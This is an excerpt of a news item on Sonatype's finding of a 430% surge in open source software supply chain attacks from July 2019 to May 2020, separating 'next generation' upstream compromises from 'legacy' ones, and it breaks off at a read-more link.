There has been a massive 430% surge in next generation cyber attacks aimed at actively infiltrating open source software supply chains, Sonatype has found.
Rise of next-gen software supply chain attacks
According to the report, 929 next generation software supply chain attacks were recorded from July 2019 through May 2020. By comparison 216 such attacks were recorded in the four years between February 2015 and June 2019.
The difference between “next generation” and “legacy” software supply chain attacks is simple but important: next generation attacks like Octopus Scanner and electron-native-notify are strategic and involve bad actors intentionally targeting and surreptitiously compromising “upstream” open source projects so they can subsequently exploit vulnerabilities when they inevitably flow “downstream” into the wild.
Conversely, legacy software supply chain attacks like Equifax are tactical and involve bad actors waiting f ..
Support the originator by clicking the read the rest link below.
